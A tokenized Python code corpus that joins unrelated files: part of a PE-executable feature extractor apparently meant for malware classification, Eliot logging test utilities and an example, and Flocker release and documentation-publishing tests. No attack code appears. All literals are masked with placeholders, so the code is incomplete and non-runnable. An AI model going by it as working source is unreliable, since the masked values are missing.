OPTIONAL_HEADER . SizeOfImage <EOL> extracted_dense [ '<STR_LIT>' ] = pe . OPTIONAL_HEADER . SizeOfCode <EOL> extracted_dense [ '<STR_LIT>' ] = pe . OPTIONAL_HEADER . SizeOfInitializedData <EOL> extracted_dense [ '<STR_LIT>' ] = pe . OPTIONAL_HEADER . SizeOfUninitializedData <EOL> extracted_dense [ '<STR_LIT>' ] = pe . OPTIONAL_HEADER . MajorLinkerVersion <EOL> extracted_dense [ '<STR_LIT>' ] = pe . OPTIONAL_HEADER . MinorLinkerVersion <EOL> extracted_dense [ '<STR_LIT>' ] = <NUM_LIT:1> if pe . is_driver ( ) else <NUM_LIT:0> <EOL> extracted_dense [ '<STR_LIT>' ] = <NUM_LIT:1> if pe . is_exe ( ) else <NUM_LIT:0> <EOL> extracted_dense [ '<STR_LIT>' ] = <NUM_LIT:1> if pe . is_dll ( ) else <NUM_LIT:0> <EOL> extracted_dense [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if pe . FILE_HEADER . Machine != <NUM_LIT> : <EOL> extracted_dense [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> extracted_dense [ '<STR_LIT>' ] = pe . FILE_HEADER . Characteristics <EOL> datadirs = { <NUM_LIT:0> : '<STR_LIT>' , <NUM_LIT:1> : '<STR_LIT>' , <NUM_LIT:2> : '<STR_LIT>' , <NUM_LIT:5> : '<STR_LIT>' , <NUM_LIT:12> : '<STR_LIT>' } <EOL> for idx , datadir in datadirs . items ( ) : <EOL> datadir = pefile . DIRECTORY_ENTRY [ idx ] <EOL> if len ( pe . OPTIONAL_HEADER . DATA_DIRECTORY ) <= idx : <EOL> continue <EOL> directory = pe . OPTIONAL_HEADER . DATA_DIRECTORY [ idx ] <EOL> extracted_dense [ '<STR_LIT>' % datadir ] = directory . Size <EOL> section_flags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> rawexecsize = <NUM_LIT:0> <EOL> vaexecsize = <NUM_LIT:0> <EOL> for sec in pe . sections : <EOL> if not sec : <EOL> continue <EOL> for char in section_flags : <EOL> if hasattr ( sec , char ) : <EOL> rawexecsize += sec . SizeOfRawData <EOL> vaexecsize += sec . Misc_VirtualSize <EOL> break <EOL> secname = convertToAsciiNullTerm ( sec . Name ) . lower ( ) <EOL> secname = secname . replace ( '<STR_LIT:.>' , '<STR_LIT>' ) <EOL> extracted_dense [ '<STR_LIT>' % secname ] = sec . get_entropy ( ) <EOL> extracted_dense [ '<STR_LIT>' % secname ] = sec . PointerToRawData <EOL> extracted_dense [ '<STR_LIT>' % secname ] = sec . SizeOfRawData <EOL> extracted_dense [ '<STR_LIT>' % secname ] = sec . Misc_VirtualSize <EOL> extracted_dense [ '<STR_LIT>' ] = vaexecsize <EOL> extracted_dense [ '<STR_LIT>' ] = rawexecsize <EOL> warnings = pe . get_warnings ( ) <EOL> if ( warnings ) : <EOL> extracted_dense [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> extracted_sparse [ '<STR_LIT>' ] = warnings <EOL> else : <EOL> extracted_dense [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> for feature in self . _dense_feature_list : <EOL> if ( extracted_dense [ feature ] == feature_not_found_flag ) : <EOL> extracted_dense [ feature ] = feature_default_value <EOL> if ( self . _verbose ) : <EOL> self . log ( '<STR_LIT>' % ( feature , feature_default_value ) ) <EOL> self . _warnings . append ( '<STR_LIT>' % ( feature , feature_default_value ) ) <EOL> for feature in self . _sparse_feature_list : <EOL> if ( extracted_sparse [ feature ] == feature_not_found_flag ) : <EOL> extracted_sparse [ feature ] = feature_default_value <EOL> if ( self . _verbose ) : <EOL> self . log ( '<STR_LIT>' % ( feature , feature_default_value ) ) <EOL> self . _warnings . append ( '<STR_LIT>' % ( feature , feature_default_value ) ) <EOL> self . _dense_features = extracted_dense <EOL> self . _sparse_features = extracted_sparse <EOL> return self . get_dense_features ( ) <EOL> def convertToUTF8 ( s ) : <EOL> if ( isinstance ( s , unicode ) ) : <EOL> return s . encode ( "<STR_LIT:utf-8>" ) <EOL> try : <EOL> u = unicode ( s , "<STR_LIT:utf-8>" ) <EOL> except : <EOL> return str ( s ) <EOL> utf8 = u . encode ( "<STR_LIT:utf-8>" ) <EOL> return utf8 <EOL> def convertToAsciiNullTerm ( s ) : <EOL> s = s . split ( '<STR_LIT:\x00>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> return s . decode ( '<STR_LIT:ascii>' , '<STR_LIT:ignore>' ) <EOL> def test ( ) : <EOL> '''<STR_LIT>''' <EOL> my_extractor = PEFileFeatures ( ) <EOL> with open ( '<STR_LIT>' , '<STR_LIT:rb>' ) as f : <EOL> print my_extractor . execute ( f . read ( ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from unittest import SkipTest <EOL> from functools import wraps <EOL> from pyrsistent import PClass , field <EOL> from . _action import ( <EOL> ACTION_STATUS_FIELD , <EOL> ACTION_TYPE_FIELD , <EOL> STARTED_STATUS , <EOL> FAILED_STATUS , <EOL> SUCCEEDED_STATUS , <EOL> ) <EOL> from . _message import MESSAGE_TYPE_FIELD , TASK_LEVEL_FIELD , TASK_UUID_FIELD <EOL> from . _output import MemoryLogger <EOL> from . import _output <EOL> COMPLETED_STATUSES = ( FAILED_STATUS , SUCCEEDED_STATUS ) <EOL> def issuperset ( a , b ) : <EOL> """<STR_LIT>""" <EOL> aItems = a . items ( ) <EOL> return all ( pair in aItems for pair in b . items ( ) ) <EOL> def assertContainsFields ( test , message , fields ) : <EOL> """<STR_LIT>""" <EOL> messageSubset = dict ( [ ( key , value ) for key , value in message . items ( ) <EOL> if key in fields ] ) <EOL> test . assertEqual ( messageSubset , fields ) <EOL> class LoggedAction ( PClass ) : <EOL> """<STR_LIT>""" <EOL> startMessage = field ( mandatory = True ) <EOL> endMessage = field ( mandatory = True ) <EOL> children = field ( mandatory = True ) <EOL> def __new__ ( cls , startMessage , endMessage , children ) : <EOL> return PClass . __new__ ( cls , startMessage = startMessage , <EOL> endMessage = endMessage , children = children ) <EOL> @ property <EOL> def start_message ( self ) : <EOL> return self . startMessage <EOL> @ property <EOL> def end_message ( self ) : <EOL> return self . endMessage <EOL> @ classmethod <EOL> def fromMessages ( klass , uuid , level , messages ) : <EOL> """<STR_LIT>""" <EOL> startMessage = None <EOL> endMessage = None <EOL> children = [ ] <EOL> levelPrefix = level [ : - <NUM_LIT:1> ] <EOL> for message in messages : <EOL> if message [ TASK_UUID_FIELD ] != uuid : <EOL> continue <EOL> messageLevel = message [ TASK_LEVEL_FIELD ] <EOL> if messageLevel [ : - <NUM_LIT:1> ] == levelPrefix : <EOL> status = message . get ( ACTION_STATUS_FIELD ) <EOL> if status == STARTED_STATUS : <EOL> startMessage = message <EOL> elif status in COMPLETED_STATUSES : <EOL> endMessage = message <EOL> else : <EOL> children . append ( LoggedMessage ( message ) ) <EOL> elif ( len ( messageLevel ) == len ( levelPrefix ) + <NUM_LIT:2> and <EOL> messageLevel [ : - <NUM_LIT:2> ] == levelPrefix and <EOL> messageLevel [ - <NUM_LIT:1> ] == <NUM_LIT:1> ) : <EOL> child = klass . fromMessages ( <EOL> uuid , message [ TASK_LEVEL_FIELD ] , messages ) <EOL> children . append ( child ) <EOL> if startMessage is None or endMessage is None : <EOL> raise ValueError ( uuid , level ) <EOL> return klass ( startMessage , endMessage , children ) <EOL> from_messages = fromMessages <EOL> @ classmethod <EOL> def ofType ( klass , messages , actionType ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> for message in messages : <EOL> if ( message . get ( ACTION_TYPE_FIELD ) == actionType . action_type and <EOL> message [ ACTION_STATUS_FIELD ] == STARTED_STATUS ) : <EOL> result . append ( klass . fromMessages ( message [ TASK_UUID_FIELD ] , <EOL> message [ TASK_LEVEL_FIELD ] , <EOL> messages ) ) <EOL> return result <EOL> of_type = ofType <EOL> def descendants ( self ) : <EOL> """<STR_LIT>""" <EOL> for child in self . children : <EOL> yield child <EOL> if isinstance ( child , LoggedAction ) : <EOL> for descendant in child . descendants ( ) : <EOL> yield descendant <EOL> @ property <EOL> def succeeded ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . endMessage [ ACTION_STATUS_FIELD ] == SUCCEEDED_STATUS <EOL> class LoggedMessage ( PClass ) : <EOL> """<STR_LIT>""" <EOL> message = field ( mandatory = True ) <EOL> def __new__ ( cls , message ) : <EOL> return PClass . __new__ ( cls , message = message ) <EOL> @ classmethod <EOL> def ofType ( klass , messages , messageType ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> for message in messages : <EOL> if message . get ( MESSAGE_TYPE_FIELD ) == messageType . message_type : <EOL> result . append ( klass ( message ) ) <EOL> return result <EOL> of_type = ofType <EOL> class UnflushedTracebacks ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def validateLogging ( assertion , * assertionArgs , ** assertionKwargs ) : <EOL> """<STR_LIT>""" <EOL> def decorator ( function ) : <EOL> @ wraps ( function ) <EOL> def wrapper ( self , * args , ** kwargs ) : <EOL> skipped = False <EOL> kwargs [ "<STR_LIT>" ] = logger = MemoryLogger ( ) <EOL> self . addCleanup ( logger . validate ) <EOL> def checkForUnflushed ( ) : <EOL> if not skipped and logger . tracebackMessages : <EOL> raise UnflushedTracebacks ( logger . tracebackMessages ) <EOL> self . addCleanup ( checkForUnflushed ) <EOL> if assertion is not None : <EOL> self . addCleanup ( lambda : skipped or assertion ( <EOL> self , logger , * assertionArgs , ** assertionKwargs ) ) <EOL> try : <EOL> return function ( self , * args , ** kwargs ) <EOL> except SkipTest : <EOL> skipped = True <EOL> raise <EOL> return wrapper <EOL> return decorator <EOL> validate_logging = validateLogging <EOL> def capture_logging ( assertion , * assertionArgs , ** assertionKwargs ) : <EOL> """<STR_LIT>""" <EOL> def decorator ( function ) : <EOL> @ validate_logging ( assertion , * assertionArgs , ** assertionKwargs ) <EOL> @ wraps ( function ) <EOL> def wrapper ( self , * args , ** kwargs ) : <EOL> logger = kwargs [ "<STR_LIT>" ] <EOL> current_logger = _output . _DEFAULT_LOGGER <EOL> _output . _DEFAULT_LOGGER = logger <EOL> def cleanup ( ) : <EOL> _output . _DEFAULT_LOGGER = current_logger <EOL> self . addCleanup ( cleanup ) <EOL> return function ( self , logger ) <EOL> return wrapper <EOL> return decorator <EOL> def assertHasMessage ( testCase , logger , messageType , fields = None ) : <EOL> """<STR_LIT>""" <EOL> if fields is None : <EOL> fields = { } <EOL> messages = LoggedMessage . ofType ( logger . messages , messageType ) <EOL> testCase . assertTrue ( messages , "<STR_LIT>" % ( messageType , ) ) <EOL> loggedMessage = messages [ <NUM_LIT:0> ] <EOL> assertContainsFields ( testCase , loggedMessage . message , fields ) <EOL> return loggedMessage <EOL> def assertHasAction ( testCase , logger , actionType , succeeded , startFields = None , <EOL> endFields = None ) : <EOL> """<STR_LIT>""" <EOL> if startFields is None : <EOL> startFields = { } <EOL> if endFields is None : <EOL> endFields = { } <EOL> actions = LoggedAction . ofType ( logger . messages , actionType ) <EOL> testCase . assertTrue ( actions , "<STR_LIT>" % ( actionType , ) ) <EOL> action = actions [ <NUM_LIT:0> ] <EOL> testCase . assertEqual ( action . succeeded , succeeded ) <EOL> assertContainsFields ( testCase , action . startMessage , startFields ) <EOL> assertContainsFields ( testCase , action . endMessage , endFields ) <EOL> return action </s>
<s> from sys import stdout <EOL> from eliot import Message , to_file <EOL> to_file ( stdout ) <EOL> class Place ( object ) : <EOL> def __init__ ( self , name , contained = ( ) ) : <EOL> self . name = name <EOL> self . contained = contained <EOL> def visited ( self , people ) : <EOL> Message . log ( message_type = "<STR_LIT>" , <EOL> people = people , place = self . name ) <EOL> for thing in self . contained : <EOL> thing . visited ( people ) <EOL> def honeymoon ( family , destination ) : <EOL> Message . log ( message_type = "<STR_LIT>" , people = family ) <EOL> destination . visited ( family ) <EOL> honeymoon ( [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> Place ( "<STR_LIT>" , <EOL> [ Place ( "<STR_LIT>" , <EOL> [ Place ( "<STR_LIT>" ) , Place ( "<STR_LIT>" ) ] ) ] ) ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from hashlib import sha256 <EOL> from gzip import GzipFile <EOL> from StringIO import StringIO <EOL> import tempfile <EOL> from textwrap import dedent <EOL> from unittest import skipUnless , skipIf <EOL> from effect import sync_perform , ComposedDispatcher , base_dispatcher <EOL> from git import Repo <EOL> from hypothesis import given <EOL> from hypothesis . strategies import text , sampled_from <EOL> from requests . exceptions import HTTPError <EOL> from boto . s3 . website import RoutingRules , RoutingRule <EOL> from twisted . python . filepath import FilePath <EOL> from twisted . python . procutils import which <EOL> from twisted . python . usage import UsageError <EOL> from . . release import ( <EOL> upload_python_packages , upload_packages , update_repo , <EOL> parse_routing_rules , publish_docs , Environments , <EOL> DocumentationRelease , DOCUMENTATION_CONFIGURATIONS , NotTagged , NotARelease , <EOL> calculate_base_branch , create_release_branch , <EOL> CreateReleaseBranchOptions , BranchExists , TagExists , <EOL> UploadOptions , create_pip_index , upload_pip_index , <EOL> update_license_file , <EOL> ) <EOL> from . . packaging import Distribution <EOL> from . . aws import FakeAWS , CreateCloudFrontInvalidation <EOL> from . . yum import FakeYum , yum_dispatcher <EOL> from flocker . testtools import TestCase <EOL> from testtools . matchers import AfterPreprocessing , Equals <EOL> FLOCKER_PATH = FilePath ( __file__ ) . parent ( ) . parent ( ) . parent ( ) <EOL> def hard_linking_possible ( ) : <EOL> """<STR_LIT>""" <EOL> scratch_directory = FilePath ( tempfile . mkdtemp ( ) ) <EOL> test_file = scratch_directory . child ( '<STR_LIT:src>' ) <EOL> test_file . touch ( ) <EOL> try : <EOL> os . link ( test_file . path , scratch_directory . child ( '<STR_LIT>' ) . path ) <EOL> return True <EOL> except : <EOL> return False <EOL> finally : <EOL> scratch_directory . remove ( ) <EOL> def MatchesRoutingRules ( rules ) : <EOL> """<STR_LIT>""" <EOL> return AfterPreprocessing ( RoutingRules . to_xml , <EOL> Equals ( RoutingRules ( rules ) . to_xml ( ) ) ) <EOL> class ParseRoutingRulesTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_empty_config ( self ) : <EOL> """<STR_LIT:U+0020>""" <EOL> rules = parse_routing_rules ( { } , "<STR_LIT>" ) <EOL> self . assertThat ( rules , MatchesRoutingRules ( [ ] ) ) <EOL> @ given ( <EOL> hostname = text ( ) , <EOL> replace = sampled_from ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , <EOL> ) <EOL> def test_add_hostname ( self , hostname , replace ) : <EOL> """<STR_LIT>""" <EOL> rules = parse_routing_rules ( { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { replace : "<STR_LIT>" } , <EOL> } , <EOL> } , hostname ) <EOL> self . assertThat ( rules , MatchesRoutingRules ( [ <EOL> RoutingRule . when ( key_prefix = "<STR_LIT>" ) . then_redirect ( <EOL> hostname = hostname , <EOL> protocol = "<STR_LIT>" , <EOL> http_redirect_code = <NUM_LIT> , <EOL> ** { replace : "<STR_LIT>" } <EOL> ) , <EOL> ] ) ) <EOL> @ given ( <EOL> hostname = text ( ) , <EOL> other_hostname = text ( ) , <EOL> replace = sampled_from ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , <EOL> ) <EOL> def test_given_hostname ( self , hostname , replace , other_hostname ) : <EOL> """<STR_LIT>""" <EOL> rules = parse_routing_rules ( { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { replace : "<STR_LIT>" , "<STR_LIT>" : other_hostname } , <EOL> } , <EOL> } , hostname ) <EOL> self . assertThat ( rules , MatchesRoutingRules ( [ <EOL> RoutingRule . when ( key_prefix = "<STR_LIT>" ) . then_redirect ( <EOL> hostname = other_hostname , <EOL> protocol = "<STR_LIT>" , <EOL> http_redirect_code = <NUM_LIT> , <EOL> ** { replace : "<STR_LIT>" } <EOL> ) , <EOL> ] ) ) <EOL> @ given ( <EOL> hostname = text ( ) , <EOL> ) <EOL> def test_long_match_first ( self , hostname ) : <EOL> """<STR_LIT>""" <EOL> rules = parse_routing_rules ( { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } , <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } , <EOL> } , <EOL> } , hostname ) <EOL> self . assertThat ( rules , MatchesRoutingRules ( [ <EOL> RoutingRule . when ( key_prefix = "<STR_LIT>" ) . then_redirect ( <EOL> hostname = hostname , <EOL> protocol = "<STR_LIT>" , <EOL> replace_key = "<STR_LIT>" , <EOL> http_redirect_code = <NUM_LIT> , <EOL> ) , <EOL> RoutingRule . when ( key_prefix = "<STR_LIT>" ) . then_redirect ( <EOL> hostname = hostname , <EOL> protocol = "<STR_LIT>" , <EOL> replace_key = "<STR_LIT>" , <EOL> http_redirect_code = <NUM_LIT> , <EOL> ) , <EOL> RoutingRule . when ( key_prefix = "<STR_LIT>" ) . then_redirect ( <EOL> hostname = hostname , <EOL> protocol = "<STR_LIT>" , <EOL> replace_key = "<STR_LIT>" , <EOL> http_redirect_code = <NUM_LIT> , <EOL> ) , <EOL> ] ) ) <EOL> class PublishDocsTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def publish_docs ( self , aws , <EOL> flocker_version , doc_version , environment , <EOL> routing_config = { } ) : <EOL> """<STR_LIT>""" <EOL> sync_perform ( <EOL> ComposedDispatcher ( [ aws . get_dispatcher ( ) , base_dispatcher ] ) , <EOL> publish_docs ( flocker_version , doc_version , <EOL> environment = environment , <EOL> routing_config = routing_config ) ) <EOL> def test_copies_documentation ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . s3_buckets [ '<STR_LIT>' ] , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> def test_copies_documentation_production ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . PRODUCTION ) <EOL> self . assertEqual ( <EOL> aws . s3_buckets [ '<STR_LIT>' ] , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> def test_deletes_removed_documentation ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . s3_buckets [ '<STR_LIT>' ] , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } ) <EOL> def test_updated_routing_rules ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING , <EOL> routing_config = { <EOL> "<STR_LIT>" : { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT:replace>" } } , <EOL> } ) <EOL> self . assertThat ( <EOL> aws . routing_rules [ '<STR_LIT>' ] , <EOL> MatchesRoutingRules ( [ <EOL> RoutingRule . when ( key_prefix = "<STR_LIT>" ) . then_redirect ( <EOL> replace_key = "<STR_LIT>" , <EOL> hostname = "<STR_LIT>" , <EOL> protocol = "<STR_LIT>" , <EOL> http_redirect_code = "<STR_LIT>" , <EOL> ) , <EOL> ] ) ) <EOL> def test_updated_routing_rules_production ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> } , <EOL> '<STR_LIT>' : { <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . PRODUCTION , <EOL> routing_config = { <EOL> "<STR_LIT>" : { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT:replace>" } } , <EOL> } ) <EOL> self . assertThat ( <EOL> aws . routing_rules [ '<STR_LIT>' ] , <EOL> MatchesRoutingRules ( [ <EOL> RoutingRule . when ( key_prefix = "<STR_LIT>" ) . then_redirect ( <EOL> replace_key = "<STR_LIT>" , <EOL> hostname = "<STR_LIT>" , <EOL> protocol = "<STR_LIT>" , <EOL> http_redirect_code = "<STR_LIT>" , <EOL> ) , <EOL> ] ) ) <EOL> def test_creates_cloudfront_invalidation_new_files ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_creates_cloudfront_invalidation_trailing_index ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_creates_cloudfront_invalidation_removed_files ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_creates_cloudfront_invalidation_previous_version ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_creates_cloudfront_invalidation_devel_new_files ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . cloudfront_invalidations , [ <EOL> 